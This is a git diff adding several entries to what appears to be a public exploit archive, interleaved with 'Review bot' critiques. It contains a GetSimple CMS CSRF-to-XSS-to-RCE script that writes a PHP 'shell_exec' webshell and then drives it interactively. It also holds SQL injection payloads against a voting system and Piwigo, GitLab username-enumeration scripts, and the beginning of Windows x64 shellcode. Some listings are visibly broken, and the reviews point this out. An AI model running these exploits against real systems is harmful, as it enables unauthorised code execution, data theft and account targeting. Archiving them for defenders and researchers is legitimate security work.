diff --git a/exploits/php/webapps/49816.py b/exploits/php/webapps/49816.py
new file mode 100755
index 000000000..32d552fdc
--- /dev/null
+++ b/exploits/php/webapps/49816.py
@@ -0,0 +1,166 @@
+# Exploit Title: GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE
+# Exploit Author: Bobby Cooke (boku) & Abhishek Joshi
+# Date: 30/04/201
+# Vendor Homepage: http://get-simple.info
+# Software Link: http://get-simple.info/download/ & http://get-simple.info/extend/plugin/custom-js/1267/
+# Vendor: 4Enzo
+# Version: v0.1
+# Tested against Server Host: Windows 10 Pro + XAMPP
+# Tested against Client Browsers: Firefox (Linux & Windows) & Internet Explorer
+# Vulnerability Description:
+# The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.
+# Full Disclosure & MITRE CVE Tracking: github.com/boku7/gsCMS-CustomJS-Csrf2Xss2Rce
+# CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
+# CVSS Base Score: 9.6
+
+import argparse,requests
+from http.server import BaseHTTPRequestHandler, HTTPServer
+from colorama import (Fore as F, Back as B, Style as S)
+from threading import Thread
+from time import sleep
+
+FT,FR,FG,FY,FB,FM,FC,ST,SD,SB = F.RESET,F.RED,F.GREEN,F.YELLOW,F.BLUE,F.MAGENTA,F.CYAN,S.RESET_ALL,S.DIM,S.BRIGHT
+def bullet(char,color):
+ C=FB if color == 'B' else FR if color == 'R' else FG
+ return SB+C+'['+ST+SB+char+SB+C+']'+ST+' '
+info,err,ok = bullet('-','B'),bullet('-','R'),bullet('!','G')
+
+class theTHREADER(object):
+ def __init__(self, interval=1):
+ self.interval = interval
+ thread = Thread(target=self.run, args=())
+ thread.daemon = True
+ thread.start()
+ def run(self):
+ run()
+
+def webshell(target):
+ try:
+ websh = "{}/webshell.php".format(target,page)
+ term = "{}{}PWNSHELL{} > {}".format(SB,FR,FB,ST)
+ welcome = ' {}{}]{}+++{}[{}========>{} HelloFriend {}<========{}]{}+++{}[{}'.format(SB,FY,FR,FY,FT,FR,FT,FY,FR,FY,ST)
+ print(welcome)
+ while True:
+ specialmove = input(term)
+ command = {'FierceGodKick': specialmove}
+ r = requests.post(websh, data=command, verify=False)
+ status = r.status_code
+ if status != 200:
+ r.raise_for_status()
+ response = r.text
+ print(response)
+ except:
+ pass
+
+
+def xhrRcePayload():
+ payload = 'var e=function(i){return encodeURIComponent(i);};'
+ payload += 'var gt = decodeURIComponent("%3c");'
+ payload += 'var lt = decodeURIComponent("%3e");'
+ payload += 'var h="application/x-www-form-urlencoded";'
+ payload += 'var u="/admin/theme-edit.php";'
+ payload += 'var xhr1=new XMLHttpRequest();'
+ payload += 'var xhr2=new XMLHttpRequest();'
+ payload += 'xhr1.onreadystatechange=function(){'
+ payload += 'if(xhr1.readyState==4 && xhr1.status==200){'
+ payload += 'r=this.responseXML;'
+ payload += 'nVal=r.querySelector("#nonce").value;'
+ payload += 'eVal=r.forms[1][2].defaultValue;'
+ payload += 'xhr2.open("POST",u,true);'
+ payload += 'xhr2.setRequestHeader("Content-Type",h);'
+ payload += 'payload=e(gt+"?php echo shell_exec($_REQUEST[solarflare]) ?"+lt);'
+ payload += 'params="nonce="+nVal+"&content="+payload+"&edited_file="+eVal+"&submitsave=Save+Changes";'
+ payload += 'xhr2.send(params);'
+ payload += '}};'
+ payload += 'xhr1.open("GET",u,true);'
+ payload += 'xhr1.responseType="document";'
+ payload += 'xhr1.send();'
+ return payload
+
+def csrfPayload():
+ payload = '
'
+ payload += ''
+ return payload
+
+class S(BaseHTTPRequestHandler):
+ def do_GET(self):
+ victim = self.client_address
+ victim = "{}:{}".format(victim[0],victim[1])
+ print("{}{} connected to Malicious CSRF Site!".format(ok,victim))
+ print('{}Waiting for admin to view a CMS webpage & trigger the XSS XHR -> RCE payload..'.format(info))
+ self.wfile.write("{}".format(csrfPayload()).encode('utf-8'))
+
+def run(server_class=HTTPServer, handler_class=S, port=80):
+ server_address = ('', port)
+ httpd = server_class(server_address, handler_class)
+ print('{}Hosting CSRF attack & listening for admin to connect..'.format(info))
+ try:
+ httpd.serve_forever()
+ except KeyboardInterrupt:
+ pass
+ httpd.server_close()
+ print('Stopping httpd...')
+
+def tryUploadWebshell(target,page):
+ try:
+ blind = target+page
+ # The ^ symbols are required to escape the <> symbols to create the non-blind webshell (^ is an escape for window cmd prompt)
+ webshUpload = {'solarflare': "echo ^>webshell.php"}
+ requests.post(url=blind, data=webshUpload, verify=False)
+ except:
+ pass
+
+def checkWebshell(target):
+ try:
+ websh = "{}/webshell.php".format(target)
+ capsule = {'FierceGodKick':'pwnt?'}
+ resp = requests.post(url=websh, data=capsule, verify=False)
+ return resp.status_code
+ except:
+ pass
+
+def sig():
+ SIG = SB+FY+" .-----.._ ,--. "+FB+" ___ "+FY+" ___ _____ _____ _ _ _____ \n"
+ SIG += FY+" | .. > ___ | | .--. "+FB+" / \\ "+FY+" |_ | _ / ___| | | |_ _| \n"
+ SIG += FY+" | |.' ,'-'"+FR+"* *"+FY+"'-. |/ /__ __ "+FB+" \\ O / "+FY+" | | | | \\ `--.| |_| | | | \n"
+ SIG += FY+" | "+FR+"* * *"+FY+" \ / \\/ \\ "+FB+" / _ \\/\\ "+FY+" | | | | |`--. \\ _ | | | \n"
+ SIG += FY+" | |> ) "+FR+" * *"+FY+" / \\ \\"+FB+" ( (_> < "+FY+"/\\__/ | \\_/ /\\__/ / | | |_| |_ \n"
+ SIG += FY+" |____..- '-.._..-'_|\\___|._..\\___\\ "+FB+"\\___/\\/"+FY+" \\____/ \\___/\\____/\\_| |_/\\___/\n"
+ SIG += FY+" __"+FR+"linkedin.com/in/bobby-cooke/"+FY+"_____ "+" __"+FR+"linkedin.com/in/reverse-shell/"+FY+"\n"+ST
+ return SIG
+
+def argsetup():
+ about = SB+FB+' The Custom JS v0.1 plugin for GetSimple CMS suffers from a Cross-Site Request Forgery (CSRF) attack that allows remote unauthenticated attackers to inject arbitrary client-side code into authenticated administrators browsers, which results in Remote Code Execution (RCE) on the hosting server, when an authenticated administrator visits a malicious third party website.\n'+ST
+ about += SB+FC+' CVSS Base Score'+FT+':'+FR+' 9.6 '+FT+'|'+FC+' CVSS v3.1 Vector'+FT+':'+FR+' AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'+FC
+ parser = argparse.ArgumentParser(description=about, formatter_class=argparse.RawTextHelpFormatter)
+ desc1 = ST+FC+'Routable domain name of the target GetSimple CMS instance'+SB
+ parser.add_argument('Target',type=str,help=desc1)
+ desc2 = ST+FC+'Path to the public page which implements the CMS theme'+ST
+ parser.add_argument('PublicPage',type=str,help=desc2)
+ args = parser.parse_args()
+ return args
+
+if __name__ == '__main__':
+ header = SB+FR+' GetSimple CMS - Custom JS Plugin Exploit\n'
+ header += SB+FB+' CSRF '+FT+'->'+FB+' Stored XSS '+FT+'->'+FB+' XHR PHP Code Injection '+FT+'->'+FB+' RCE\n'+ST
+ header += SB+FT+' '+FR+' Bobby '+FR+'"'+FR+'boku'+FR+'"'+FR+' Cooke & Abhishek Joshi\n'+ST
+ print(header)
+ args = argsetup()
+ target = args.Target
+ page = args.PublicPage
+ print(sig())
+ theTHREADER()
+ pwnt = checkWebshell(target)
+ if pwnt != 200:
+ while pwnt != 200:
+ sleep(3)
+ tryUploadWebshell(target,page)
+ sleep(2)
+ pwnt = checkWebshell(target)
+ print("{} A wild webshell appears!".format(ok))
+ webshell(target)
\ No newline at end of file
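Review bot: `csrfPayload()` returns an effectively empty string in this listing — the single-quoted literal opened on the `payload = '` line is closed on the following physical line, which Python rejects as an unterminated string, so the HTML/JS wrapper that should embed the output of `xhrRcePayload()` has been lost; the same stripping shows in `tryUploadWebshell`, where `echo ^>webshell.php` would write an empty file rather than the PHP handler that `webshell()` later posts `FierceGodKick` to. Separately, `webshell`, `tryUploadWebshell` and `checkWebshell` each use a bare `except: pass`, so a mistyped target or refused connection makes the `while pwnt != 200` poll in `__main__` spin silently forever; `except requests.RequestException as exc:` with a `print(err + str(exc))` would surface the failure instead. `verify=False` on every request disables TLS certificate validation unconditionally, which is fine for a lab but should be a flag for anything else, and `class S(BaseHTTPRequestHandler)` shadows the `Style as S` alias from the colorama import (harmless only because `ST/SD/SB` were bound first).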
diff --git a/exploits/php/webapps/49817.txt b/exploits/php/webapps/49817.txt
new file mode 100644
index 000000000..0b9089ab3
--- /dev/null
+++ b/exploits/php/webapps/49817.txt
@@ -0,0 +1,171 @@
+# Exploit Title: Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)
+# Date: 02/05/2021
+# Exploit Author: Syed Sheeraz Ali
+# Vendor Homepage: https://www.sourcecodester.com/php/12306/voting-system-using-php.html
+# Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows 10 20H2 + XAMPP v3.2.4
+
+If we try to login as a voter and catch the login request in burp then pass it to sql map then we can put our payload in voter parameter
+
+Vulnerable code
+
+```
+
+Path :- /votersystem/login.php
+
+
+query($sql);
+
+
+ if($query->num_rows < 1){
+
+ $_SESSION['error'] = 'Cannot find voter with the ID';
+
+ }
+
+ else{
+
+ $row = $query->fetch_assoc();
+
+ if(password_verify($password, $row['password'])){
+
+ $_SESSION['voter'] = $row['id'];
+
+ }
+
+ else{
+
+ $_SESSION['error'] = 'Incorrect password';
+
+ }
+
+ }
+
+
+
+ }
+
+ else{
+
+ $_SESSION['error'] = 'Input voter credentials first';
+
+ }
+
+
+ header('location: index.php');
+
+
+?>
+
+```
+Request
+
+```
+
+POST /login.php HTTP/1.1
+Host: 10.129.139.200
+Content-Length: 27
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://10.129.139.200
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-GPC: 1
+Referer: http://10.129.139.200/
+Accept-Encoding: gzip, deflate
+Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
+Cookie: PHPSESSID=vuukl0gemht1iiq7lmptu7npoe
+Connection: close
+
+voter=as&password=as&login=
+
+```
+Sqlmap output
+
+```
+
+python3 sqlmap.py --dbms=mysql --batch --level=1 --risk=3 -r /Users/sheerazali/Documents/wpcve/voter.req -p voter
+
+ ___
+
+ __H__
+
+ ___ ___[)]_____ ___ ___ {1.5.4.7#dev}
+
+|_ -| . [(] | .'| . |
+
+|___|_ ["]_|_|_|__,| _|
+
+ |_|V... |_| http://sqlmap.org
+
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior
+mutual consent is illegal. It is the end user's responsibility to obey all
+applicable local, state and federal laws. Developers assume no liability
+and are not responsible for any misuse or damage caused by this program
+
+
+[*] starting @ 07:50:56 /2021-05-02/
+
+
+[07:50:56] [INFO] parsing HTTP request from
+'/Users/sheerazali/Documents/wpcve/voter.req'
+
+[07:50:57] [INFO] testing connection to the target URL
+
+got a 302 redirect to 'http://10.129.139.200:80/index.php'. Do you want to follow? [Y/n] Y
+
+redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] Y
+
+sqlmap resumed the following injection point(s) from stored session:
+
+---
+
+Parameter: voter (POST)
+
+ Type: time-based blind
+
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+
+ Payload: voter=as' AND (SELECT 2487 FROM (SELECT(SLEEP(5)))WYpt) AND 'hBVQ'='hBVQ&password=as&login=
+
+---
+
+[07:50:57] [INFO] testing MySQL
+
+do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
+
+[07:51:08] [INFO] confirming MySQL
+[07:51:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
+[07:51:19] [INFO] adjusting time delay to 1 second due to good response times
+[07:51:19] [INFO] the back-end DBMS is MySQL
+
+web application technology: PHP 7.3.27, Apache 2.4.46
+
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+
+[07:51:19] [INFO] fetched data logged to text files under '/Users/sheerazali/.local/share/sqlmap/output/10.129.139.200'
+
+
+[*] ending @ 07:51:19 /2021-05-02/
+
+```
\ No newline at end of file
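Review bot: The vulnerable-code excerpt begins at `query($sql);`, so the statement that builds `$sql` from the `voter` POST field — the actual defect — is not shown, and a reader cannot verify the injection from the code alone; the sqlmap payload on the `Parameter: voter (POST)` line indicates the value is concatenated inside a single-quoted string. The application-side fix is a prepared statement for the voter lookup, e.g. `$stmt = $conn->prepare('SELECT * FROM voters WHERE voters_id = ?'); $stmt->bind_param('s', $voter);` with the table and column names taken from the omitted line. It is also worth noting in the advisory that the vector is time-based only because `login.php` answers every outcome with the same `302` to `index.php` (visible in the sqlmap prompt), which is why `--risk=3` and the `SLEEP(5)` payload were needed.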
diff --git a/exploits/php/webapps/49818.py b/exploits/php/webapps/49818.py
new file mode 100755
index 000000000..4fac794c7
--- /dev/null
+++ b/exploits/php/webapps/49818.py
@@ -0,0 +1,60 @@
+# Exploit Title: Piwigo 11.3.0 - 'language' SQL
+# Author: @nu11secur1ty
+# Testing and Debugging: nu11secur1ty
+# Date: 04.30.2021
+# Vendor: https://piwigo.org/
+# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0
+# CVE: CVE-2021-27973
+
+[+] Exploit Source:
+
+#!/usr/bin/python3
+# Author: @nu11secur1ty
+# Debug: @nu11secur1ty
+# CVE-2021-27973
+
+from selenium import webdriver
+import time
+
+
+#enter the link to the website you want to automate login.
+website_link="http://192.168.1.3/piwigo/"
+
+#enter your login username
+username="admin"
+
+#enter your login password
+password="password"
+
+#enter the element for username input field
+element_for_username="username"
+
+#enter the element for password input field
+element_for_password="password"
+
+#enter the element for submit button
+element_for_submit="login"
+
+print("Loading... ;)")
+time.sleep(1)
+browser = webdriver.Chrome()
+browser.get((website_link))
+
+try:
+username_element = browser.find_element_by_name(element_for_username)
+username_element.send_keys(username)
+password_element = browser.find_element_by_name(element_for_password)
+password_element.send_keys(password)
+signInButton = browser.find_element_by_name(element_for_submit)
+signInButton.click()
+
+# Languages Exploit
+time.sleep(5)
+browser.get(("
+http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate"))
+
+print("The payload for category Languages is deployed...\n")
+
+except Exception:
+#### This exception occurs if the element are not found in the webpage.
+print("Some error occured :(")
\ No newline at end of file
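Review bot: The script as listed does not run: the body of the `try:` block starting at `username_element = browser.find_element_by_name(...)` is not indented, and the `browser.get(("` call splits its URL literal across two physical lines, which is a syntax error. The injection is only reachable after a successful login with the `username="admin"` / `password="password"` values set at the top, so this is an authenticated, error-based SQLi via `updatexml(1,concat(0x7e,(version())),0)` on the `language` parameter of `admin.php?page=languages`, and the title line should say `(Authenticated)`. The host `192.168.1.3` is hard-coded twice; deriving the second URL from `website_link` (`website_link + "admin.php?page=languages&language=..."`) keeps the two from drifting apart, and the `except Exception:` branch should print the exception rather than a fixed `Some error occured` so a missing form field is distinguishable from a failed login.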
diff --git a/exploits/ruby/webapps/49821.sh b/exploits/ruby/webapps/49821.sh
new file mode 100755
index 000000000..c4af50ff2
--- /dev/null
+++ b/exploits/ruby/webapps/49821.sh
@@ -0,0 +1,111 @@
+# Exploit Title: GitLab Community Edition (CE) 13.10.3 - User Enumeration
+# Date: 4/29/2021
+# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
+# Vendor Homepage: https://gitlab.com/
+# Version: 13.10.3
+# Tested on: Kali Linux 2021.1
+
+#!/bin/bash
+
+#Colors
+RED='\033[38;5;196m'
+GREEN='\e[38;5;47m'
+NC='\033[0m'
+BOLD='\e[1m'
+PINK='\e[38;5;198m'
+Italic='\e[3m'
+BBlue='\e[44m'
+YELLOW='\033[0;33m'
+
+clear
+echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+echo -e " ${BBlue}${BOLD}GitLab User Enumeration Script${NC}"
+echo -e " ${BOLD}Version 1.0${NC}\n"
+echo -e "${BOLD}${PINK}Description: ${NC}It prints out the usernames that exist in your victim's GitLab CE instance\n"
+echo -e "${BOLD}${PINK}Disclaimer: ${NC}${Italic}Do not run this script against ${BOLD}GitLab.com!${NC}${Italic} Also keep in mind that this PoC is meant only"
+echo -e "for educational purpose and ethical use. Running it against systems that you do not own or have the"
+echo -e "right permission is totally on your own risk.\n${NC}"
+echo -e "${BOLD}${PINK}Author:${NC}${BOLD} @4DoniiS${NC}${Italic} [https://github.com/4D0niiS]${NC}"
+echo -e "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
+echo ""
+echo ""
+
+
+
+# Usage
+usage() {
+echo -e "${YELLOW}usage: ./gitlab_user_enum.sh --url --userlist ${NC}\n"
+
+echo -e "${Italic}PARAMETERS:${NC}"
+echo -e "-------------"
+echo -e "-u/--url The URL of your victim's GitLab instance"
+echo -e "--userlist Path to a username wordlist file (one per line)"
+echo -e "-h/--help Show this help message and exit"
+echo -e "\n"
+echo -e "${Italic}Example:${NC}"
+echo -e "-------------"
+echo -e "./gitlab_user_enum.sh --url http://gitlab.local/ --userlist /home/user/usernames.txt"
+}
+
+#check for params
+args=("$@")
+URL=""
+user_list=""
+
+for (( i=0; i < $#; i++))
+{
+ case ${args[$i]} in
+ --url | -u)
+ #GitLab's URL
+ URL=${args[$((i+1))]}
+ ;;
+ --userlist)
+ #Username wordlist
+ user_list=${args[$((i+1))]}
+ ;;
+ -h | --help | "")
+ #Help Menu
+ usage
+ exit 0
+ ;;
+ esac
+}
+
+
+## checking the mandatory parameter (URL)
+if [ -z "$URL" ]
+then
+ usage
+ echo ""
+ echo -e "${RED}${BOLD}The URL of your GitLab target (--url) is missing. ${NC}"
+ exit 0
+fi
+
+
+# User Enumeration Function
+enumeration(){
+
+while IFS= read -r line
+do
+ echo "LOOP"
+ HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" $URL/$line)
+ echo $HTTP_Code
+ #echo "\n"
+ if [ $HTTP_Code -eq 200 ]
+ then
+ echo -e "${GREEN}${BOLD}[+]${NC} The username ${GREEN}${BOLD}$line ${NC}exists!"
+ #check the connection
+ elif [ $HTTP_Code -eq 000 ]
+ then
+ echo -e "${BOLD}${RED}[!]${NC} The target is unreachable. Please make sure that you entered target's URL correctly and you have connection with it!"
+ exit 0
+ fi
+
+done < "$user_list"
+
+}
+
+
+
+# Main
+enumeration
\ No newline at end of file
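Review bot: `enumeration()` never validates `--userlist`, so when it is omitted or unreadable the `done < "$user_list"` redirect fails with a shell error after the banner; add `[ -z "$user_list" ] || [ ! -r "$user_list" ]` next to the existing URL check, and make both error paths `exit 1` rather than `exit 0` so callers can detect failure. The `-eq 200` test is a weak signal: `$URL/$line` is a generic top-level path, so wordlist entries that collide with existing GitLab routes or group names will likely be reported as users — the `/users/<name>/exists` JSON endpoint described in the companion write-up gives an unambiguous `{"exists":...}` answer. Quote the URL in the curl call, `HTTP_Code=$( curl -s -o /dev/null -w "%{http_code}" "$URL/$line" )`, so names containing shell metacharacters are not word-split or globbed. The `#!/bin/bash` line sits after the comment header and is therefore not honored as a shebang, yet the `for (( ... )) { ... }` loop form is bash-specific; move it to line 1 or document that the script must be invoked with `bash`.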
diff --git a/exploits/ruby/webapps/49822.rb b/exploits/ruby/webapps/49822.rb
new file mode 100755
index 000000000..a752145ac
--- /dev/null
+++ b/exploits/ruby/webapps/49822.rb
@@ -0,0 +1,82 @@
+# Exploit Title: GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration
+# Date: 4/29/2021
+# Exploit Author: @4D0niiS [https://github.com/4D0niiS]
+# Vendor Homepage: https://gitlab.com/
+# Version: 13.10.3
+# Tested on: Kali Linux 2021.1
+
+INFO: An unauthenticated attacker can remotely enumerate the existence of different usernames in her victim's GitLab CE instance by leveraging its sign_up page [Ex: http://gitlab.local/users/sgin_up].
+
+DISCLAIMER: Do not test this method against GitLab.com. Also keep in mind that this PoC is meant only for educational purpose and ethical use. Testing it against systems that you do not own or have the right permission is totally on your own risk.
+
+STEPS: The required steps for this purpose are as follows:
+
+1- fill in the "username" field on sign_up form with something and ensure it is validating the entered username
+2- repeat step1 (with username: testuser) while you are intercepting the created request with a proxy tool like Burp Suite. You should see a request similar to the one bellow:
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+GET /users/testuser/exists HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
+Accept: application/json, text/plain, /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1/users/sign_up
+X-CSRF-Token:
+X-Requested-With: XMLHttpRequest
+Connection: close
+Cookie: experimentation_subject_id=; known_sign_in=; _gitlab_session=
+----------------------------------------------------------------------------------------------------------------------------------------------------------------
+* note that the tested username (testuser) is in URI
+
+3- Send this request to Burp's intruder and run a brute force attack on it by replacing "testuser" in the URI as the enumeration parameter.
+4- Valid usernames can be found by looking for the statement {"exists":true} in responses. On the other hand, invalid ones give {"exists":false} in responses. So you can find valid users by analyzing the responses. Take the following examples:
+
+-------------------------------------------The following response belongs to a valid user ------------------------------------------
+HTTP/1.1 200 OK
+Server: nginx
+Date: Mon, 19 Apr 2021 09:52:44 GMT
+Content-Type: application/json; charset=utf-8
+Content-Length: 15
+Connection: close
+Cache-Control: max-age=0, private, must-revalidate
+Etag: W/"8063e5a51719c58189c7d5209a5f37b3"
+Page-Title: GitLab
+Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:52:44 GMT; HttpOnly
+X-Content-Type-Options: nosniff
+X-Download-Options: noopen
+X-Frame-Options: DENY
+X-Gitlab-Feature-Category: users
+X-Permitted-Cross-Domain-Policies: none
+X-Request-Id: 01F3MRQTB94MT0HQXE0NMEMP7F
+X-Runtime: 0.221557
+X-Ua-Compatible: IE=edge
+X-Xss-Protection: 1; mode=block
+Strict-Transport-Security: max-age=31536000
+Referrer-Policy: strict-origin-when-cross-origin
+
+{"exists":true}
+
+-------------------------------------------The following response belongs to an invalid user ------------------------------------------
+HTTP/1.1 200 OK
+Server: nginx
+Date: Mon, 19 Apr 2021 09:55:34 GMT
+Content-Type: application/json; charset=utf-8
+Content-Length: 16
+Connection: close
+Cache-Control: max-age=0, private, must-revalidate
+Etag: W/"e39f603a5ebcff23859d200f9c9dc20f"
+Page-Title: GitLab
+Set-Cookie: _gitlab_session=; path=/; expires=Mon, 19 Apr 2021 11:55:34 GMT; HttpOnly
+X-Content-Type-Options: nosniff
+X-Download-Options: noopen
+X-Frame-Options: DENY
+X-Gitlab-Feature-Category: users
+X-Permitted-Cross-Domain-Policies: none
+X-Request-Id: 01F3MRX0GJGG1DE8RPKPCVC7Q0
+X-Runtime: 0.033046
+X-Ua-Compatible: IE=edge
+X-Xss-Protection: 1; mode=block
+Strict-Transport-Security: max-age=31536000
+Referrer-Policy: strict-origin-when-cross-origin
+
+{"exists":false}
\ No newline at end of file
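Review bot: The INFO line's example URL reads `/users/sgin_up`; the route is `/users/sign_up`, as the `Referer` in the captured request shows. The write-up would be stronger if it stated explicitly what the capture already demonstrates — `X-CSRF-Token` and `_gitlab_session` are both empty, so `GET /users/<name>/exists` answers without any session — and gave instance administrators a mitigation, since the `{"exists":true}` / `{"exists":false}` response difference is inherent to the feature: rate-limit that endpoint, and presumably disabling self sign-up removes the need for it (worth confirming that the route is actually gated by that setting before recommending it).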
diff --git a/files_exploits.csv b/files_exploits.csv
index 1baf008cc..22a3745e5 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -43985,3 +43985,8 @@ id,file,description,date,author,type,platform,port
49811,exploits/php/webapps/49811.txt,"FOGProject 1.5.9 - File Upload RCE (Authenticated)",2021-04-29,sml,webapps,php,
49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,
49814,exploits/php/webapps/49814.txt,"Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS)",2021-04-30,"Fariskhi Vidyan",webapps,php,
+49816,exploits/php/webapps/49816.py,"GetSimple CMS Custom JS 0.1 - CSRF to XSS to RCE",2021-05-03,boku,webapps,php,
+49817,exploits/php/webapps/49817.txt,"Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)",2021-05-03,"Syed Sheeraz Ali",webapps,php,
+49818,exploits/php/webapps/49818.py,"Piwigo 11.3.0 - 'language' SQL",2021-05-03,nu11secur1ty,webapps,php,
+49821,exploits/ruby/webapps/49821.sh,"GitLab Community Edition (CE) 13.10.3 - User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
+49822,exploits/ruby/webapps/49822.rb,"GitLab Community Edition (CE) 13.10.3 - 'Sign_Up' User Enumeration",2021-05-03,4D0niiS,webapps,ruby,
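Review bot: The 49818 row's description `Piwigo 11.3.0 - 'language' SQL` omits that the script logs in with admin credentials before sending the injection, so the vector is authenticated; `Piwigo 11.3.0 - 'language' SQL Injection (Authenticated)` would match the convention used by the 49811 row above it.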
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 32307fc3b..048f260c0 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1034,3 +1034,5 @@ id,file,description,date,author,type,platform
49592,shellcodes/windows_x86/49592.asm,"Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes)",2021-02-24,"Armando Huesca Prida",shellcode,windows_x86
49768,shellcodes/linux_x86/49768.c,"Linux/x86 - execve(/bin/sh) Shellcode (17 bytes)",2021-04-15,s1ege,shellcode,linux_x86
49770,shellcodes/linux_x86-64/49770.c,"Linux/x64 - execve(/bin/sh) Shellcode (21 bytes) (2)",2021-04-15,s1ege,shellcode,linux_x86-64
+49819,shellcodes/windows_x86-64/49819.c,"Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
+49820,shellcodes/windows_x86-64/49820.c,"Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes)",2021-05-03,boku,shellcode,windows_x86-64
diff --git a/shellcodes/windows_x86-64/49819.c b/shellcodes/windows_x86-64/49819.c
new file mode 100644
index 000000000..af94e8700
--- /dev/null
+++ b/shellcodes/windows_x86-64/49819.c
@@ -0,0 +1,133 @@
+# Shellcode Title: Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes)
+# Shellcode Author: Bobby Cooke (boku)
+# Date: 02/05/2021
+# Tested on: Windows 10 v2004 (x64)
+# Shellcode Description:
+# 64bit Windows 10 shellcode that dynamically resolves the base address of kernel32.dll via PEB & ExportTable method.
+# Contains no Null bytes (0x00), and therefor will not crash if injected into typical stack Buffer OverFlow vulnerabilities.
+# Grew tired of Windows Defender alerts from MSF code when developing, so built this as a template for development of advanced payloads.
+
+; Compile & get shellcode from Kali:
+; nasm -f win64 popcalc.asm -o popcalc.o
+; for i in $(objdump -D popcalc.o | grep "^ " | cut -f2); do echo -n "\x$i" ; done
+; Get kernel32.dll base address
+xor rdi, rdi ; RDI = 0x0
+mul rdi ; RAX&RDX =0x0
+mov rbx, gs:[rax+0x60] ; RBX = Address_of_PEB
+mov rbx, [rbx+0x18] ; RBX = Address_of_LDR
+mov rbx, [rbx+0x20] ; RBX = 1st entry in InitOrderModuleList / ntdll.dll
+mov rbx, [rbx] ; RBX = 2nd entry in InitOrderModuleList / kernelbase.dll
+mov rbx, [rbx] ; RBX = 3rd entry in InitOrderModuleList / kernel32.dll
+mov rbx, [rbx+0x20] ; RBX = &kernel32.dll ( Base Address of kernel32.dll)
+mov r8, rbx ; RBX & R8 = &kernel32.dll
+
+; Get kernel32.dll ExportTable Address
+mov ebx, [rbx+0x3C] ; RBX = Offset NewEXEHeader
+add rbx, r8 ; RBX = &kernel32.dll + Offset NewEXEHeader = &NewEXEHeader
+xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
+add cx, 0x88ff
+shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
+mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
+add rdx, r8 ; RDX = &kernel32.dll + RVA ExportTable = &ExportTable
+
+; Get &AddressTable from Kernel32.dll ExportTable
+xor r10, r10
+mov r10d, [rdx+0x1C] ; RDI = RVA AddressTable
+add r10, r8 ; R10 = &AddressTable
+
+; Get &NamePointerTable from Kernel32.dll ExportTable
+xor r11, r11
+mov r11d, [rdx+0x20] ; R11 = [&ExportTable + Offset RVA Name PointerTable] = RVA NamePointerTable
+add r11, r8 ; R11 = &NamePointerTable (Memory Address of Kernel32.dll Export NamePointerTable)
+
+; Get &OrdinalTable from Kernel32.dll ExportTable
+xor r12, r12
+mov r12d, [rdx+0x24] ; R12 = RVA OrdinalTable
+add r12, r8 ; R12 = &OrdinalTable
+
+jmp short apis
+
